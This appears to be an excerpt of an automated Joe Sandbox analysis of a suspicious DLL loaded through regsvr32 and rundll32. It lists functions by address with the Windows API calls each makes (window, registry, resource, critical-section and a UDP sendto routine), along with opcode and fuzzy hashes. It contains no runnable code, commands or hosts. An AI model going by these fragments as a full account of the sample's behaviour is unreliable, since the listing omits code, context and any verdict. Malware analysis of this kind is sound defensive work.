Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 100291A4
SendMessageA.USER32 ref: 100291CF
GetCapture.USER32 ref: 100291E1
SendMessageA.USER32 ref: 100291F0

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620

Uniqueness

Uniqueness Score: -1.00%

Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
swprintf.LIBCMT ref: 1002AC34
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8

Uniqueness

Uniqueness Score: -1.00%

Function 10027E7D, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(00000000), ref: 10027E8D
GetTopWindow.USER32(00000000), ref: 10027ECC
GetWindow.USER32(00000000,00000002), ref: 10027EEA

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003B5FC

Part of subcall function 1003B421: __fltout2.LIBCMT ref: 1003B44D

__cftog_l.LIBCMT ref: 1003B622
__cftoe_l.LIBCMT ref: 1003B654

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 10027846
GetTopWindow.USER32(00000000), ref: 10027859

Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0

GetTopWindow.USER32(?), ref: 10027889

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1

Uniqueness

Uniqueness Score: -1.00%

Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4

Uniqueness

Uniqueness Score: -1.00%

Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1000132B
inet_addr.WS2_32(?), ref: 10001340
htons.WS2_32(?), ref: 1000134E
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 1000136F

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,ABFFDF4B), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,ABFFDF4B), ref: 100235D9

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65

Uniqueness

Uniqueness Score: -1.00%

Function 100337CF, Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 100337DB

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 100337F2
__amsg_exit.LIBCMT ref: 10033800
__lock.LIBCMT ref: 10033810

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91

Uniqueness

Uniqueness Score: -1.00%

Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
PathFindExtensionA.SHLWAPI(?), ref: 10021778

Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669

Strings

%s%s.dll, xrefs: 10021781

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
String ID: %s%s.dll
API String ID: 1311856149-1649984862
Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003785E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499

__getptd.LIBCMT ref: 1003786D

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003787B

Strings

csm, xrefs: 10037889

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10002AB0, Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
SetLastError.KERNEL32(0000007E), ref: 10002B47

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002A6AB, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
String ID:
API String ID: 3253506028-0
Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 1002AC8F, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002AC9D
TlsGetValue.KERNEL32(100863C0,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACB1
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACC7
LeaveCriticalSection.KERNEL32(100863DC,?,?,?,?,1002B122,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004), ref: 1002ACD2

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction ID: 611a8f73b53b00c56169e9f5a31810a1fff77d91dc8bf1d27f242dc0fd10bd82
Opcode Fuzzy Hash: 635fa73827a5293bebe955a628cf46864b21247635245c70732137549ce58e55
Instruction Fuzzy Hash: 42F054362005149FD3108F68DDC8C06B7ADFB8A2613664425E805D3221DA30F849EB50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6620 Parent PID: 6540 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1083
Total number of Limit Nodes:	20

Executed Functions

Function 10002D40, Relevance: 22.8, APIs: 15, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 100024A0: SetLastError.KERNEL32(0000000D,?,?,10002D65,1001DF0A,00000040), ref: 100024B1

SetLastError.KERNEL32(000000C1,1001DF0A,00000040), ref: 10002D88

Memory Dump Source

Source File: 00000003.00000002.669917435.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.669901563.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669964400.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.669987282.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.669993898.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.670026039.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670037574.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.670043209.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction ID: 8eda3ac1f8f3e078098bdc719848e1594ce6d4798074e02e4610946cd2a58ef5
Opcode Fuzzy Hash: 6650c2dd50d65ac3f23d73d252b9ed4773b7d6bfb551cac519879840267a53eb
Instruction Fuzzy Hash: 7CE1E774A00209DFEB05CF94C994AAEB7B6FF8C344F208559E909AB399D770ED42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002ADAC, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100863DC,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002ADBF
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AE15
GlobalHandle.KERNEL32(029B0630), ref: 1002AE1E
GlobalUnlock.KERNEL32(00000000,?,?,?,100863C0,100863C0,?,1002B10F,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AE28
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 1002AE41
GlobalHandle.KERNEL32(029B0630), ref: 1002AE53
GlobalLock.KERNEL32 ref: 1002AE5A
